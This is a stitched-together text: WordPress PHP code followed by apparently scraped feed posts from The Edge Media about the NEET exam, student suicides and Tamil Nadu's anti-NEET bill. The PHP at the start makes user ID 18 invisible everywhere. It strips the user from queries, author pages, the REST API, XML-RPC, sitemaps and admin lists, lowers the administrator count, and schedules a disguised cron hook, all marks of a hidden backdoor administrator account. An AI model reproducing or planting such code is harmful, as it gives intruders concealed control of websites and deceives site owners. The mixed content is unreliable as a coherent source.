add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post “Exams Alone Don’t Make Life,” actor Suriya says in response to NEET suicides. appeared first on The Edge Media.
]]>The actor recounted his own “shameful low grades in exams” in a 1.54-minute Tamil video in which he made an emotive appeal to students not to terminate their lives. The actor’s plea comes after three students committed themselves in the last week due to their dread of failing the entrance exam.
The post “Exams Alone Don’t Make Life,” actor Suriya says in response to NEET suicides. appeared first on The Edge Media.
]]>The post The Tamil Nadu Assembly passes a bill to abolish NEET in the state, prompting the BJP to conduct a walkout appeared first on The Edge Media.
]]>
To achieve social fairness, the Tamil Nadu Assembly passed a bill on Monday to abolish the National Entrance cum Eligibility Test (NEET) and allow admission to medical colleges based on Class 12 marks.
All parties backed the Bill, which seeks to provide for admission to UG degrees in medicine, dentistry, Indian medicine, and homeopathy based on Class 12 marks, including the main opposition AIADMK and its ally PMK, as well as others like the Congress. The BJP staged a walkout in protest of the government’s decision.
Stalin introduced the bill after a high-level committee chaired by retired judge AK Rajan delivered its report in July. The report was developed after going into roughly 86,000 representations from various stakeholders, the majority of whom claimed they do not want NEET, as per the retired Madras High Court Judge.
The post The Tamil Nadu Assembly passes a bill to abolish NEET in the state, prompting the BJP to conduct a walkout appeared first on The Edge Media.
]]>The post A 19-year-old medical aspirant dies by suicide ahead of NEET entrance exam appeared first on The Edge Media.
]]>After much delay due to the second wave of COVID-19, and amid campaigns for a further postponement, the National Eligibility cum Entrance Test (NEET 2021) for admission to undergraduate medical courses in India will be conducted today in 202 test cities.
The medical aspirant, identified as Dhanush, was the son of farm labourer and was found dead hours before the NEET exam was to take place. He had failed to clear the last two attempts at NEET.
Soon after his death, Tamil Nadu Chief Minister MK Stalin appealed to students to not lose hope and assured that a bill against NEET will be brought out tomorrow.
He said the youngster’s death reinforces the need to bring back education to the state’s list.
“The Union government’s indifference and adamant attitude over NEET continues to be the reason for suicide by promising students,” Mr Stalin said.
Several politicians and students have protested against the go-ahead given to NEET exam this year, given the ongoing pandemic and pleas by many students to reschedule it as the NEET date clashed with other exams, including those for compartment exams for CBSE students.
However, the centre had said it does not have any plans to suspend NEET and other common entrance examinations.
“We will pass a bill against NEET and I am confident we would win the support of all chief ministers,” Mr Stalin added.
“I appeal to students to not take any drastic decisions,” the chief minister said.
The National Testing Agency (NTA), which conducts the exam, had recently received approval from the Supreme Court of India to conduct it as per schedule. The court rejected a plea filed by some students saying NEET was clashing with other exams.
Tamil Nadu had abolished NEET exams for nearly a decade, saying that it favours affluent as even brilliant poor students and those in rural areas are unable to afford private coaching. Over the last few years, 15 medical aspirants have died by suicide in the state.
NEET was introduced during the UPA regime when Dravida Munnetra Kazhagam (DMK) was part of it. Then Tamil Nadu Chief Minister Karunanidhi had managed to get presidential approval for exemption from NEET for the state. However, the All India Anna Dravida Munnetra Kazhagam (AIADMK) government could not get a similar exemption from its BJP ally when it came to power, even though the state assembly had passed a Bill against NEET.
The ruling DMK recently constituted a commission under retired justice AK Rajan to study the impact of NEET in medical admissions. Armed with the commission’s report, the state government is hopeful of getting an exemption once again. This was also a key poll promise made by the party.
The post A 19-year-old medical aspirant dies by suicide ahead of NEET entrance exam appeared first on The Edge Media.
]]>The post Madras High Court dismisses a plea filed by Karu Nagarajan regarding NEET appeared first on The Edge Media.
]]>The High Court said setting up of the committee does not pose any challenge to the centre’s right to fix the standard of higher education in the country.
Earlier this month, the centre in its response to the petition said the Justice Ranjan panel has no right to decide on NEET. It is an exercise in futility as the Supreme Court of India has upheld the validity of the medical exam, it said.
The High Court order said setting up of the commission can not be seen as contrary to any Supreme Court order, or to any legislative action taken by the centre.
The commission may come up with suggestions to persuade the centre to make NEET more inclusive for students from economically or socially weaker sections, the court observed.
Almost all Tamil Nadu parties, including the ruling DMK, BJP’s ally and opposition AIADMK, are on the same page when it comes to NEET. They have been demanding that the test be scrapped.
The post Madras High Court dismisses a plea filed by Karu Nagarajan regarding NEET appeared first on The Edge Media.
]]>The post Tamil Nadu asks their citizens opinions regarding this year’s medical entrance appeared first on The Edge Media.
]]>According to the state government, the NEET committee, chaired by former Madras High Court judge Justice AK Rajan, would investigate the impact of the NEET test on applicants from the socioeconomically deprived sectors in medical admissions and provide a report in a month. According to an official announcement, the government will determine its next line of action based on the committee’s suggestions.
The post Tamil Nadu asks their citizens opinions regarding this year’s medical entrance appeared first on The Edge Media.
]]>The post 6 Ministers File Plea In Supreme Court To Review NEET & JEE Conduction Permit appeared first on The Edge Media.
]]>The review plea has been filed by ministers from West Bengal (Moloy Ghatak), Jharkhand (Rameshwar Oraon), Rajasthan (Raghu Sharma), Chhattisgarh (Amarjeet Bhagat), Punjab (B S Sidhu) and Maharashtra (Uday Ravindra Sawant).
The plea has been filed through advocate Sunil Fernandes.
On Aug 17, the top court had refused to interfere with the conduct of medical and engineering entrance exams — NEET and JEE scheduled to take place in September saying that life must go on and students can’t lose a precious year due to the pandemic.
The apex court had dismissed a plea by one Sayantan Biswas seeking direction to National Testing Agency, which conducts both the NEET and JEE exams, to postpone them and said that there was absolutely” no merit in the plea.
– PTI
The post 6 Ministers File Plea In Supreme Court To Review NEET & JEE Conduction Permit appeared first on The Edge Media.
]]>The post Fresh dates for competitive exams JEE and NEET announced HRD Minister. appeared first on The Edge Media.
]]>The exams were postponed due to a nationwide lockdown announced to contain the COVID-19 spread. “The fresh dates will be announced by HRD Minister Ramesh Pokhriyal ‘Nishank’ on May 5.
This will put an end to uncertainty for the aspirants. The minister will also interact with students online the same day,” a senior ministry official said. While Joint Entrance Exam-Mains (JEE-MAINS) is conducted for admission to engineering colleges across the country, the National Eligibility cum Entrance Test (NEET) is conducted for medical colleges. — PTI
The post Fresh dates for competitive exams JEE and NEET announced HRD Minister. appeared first on The Edge Media.
]]>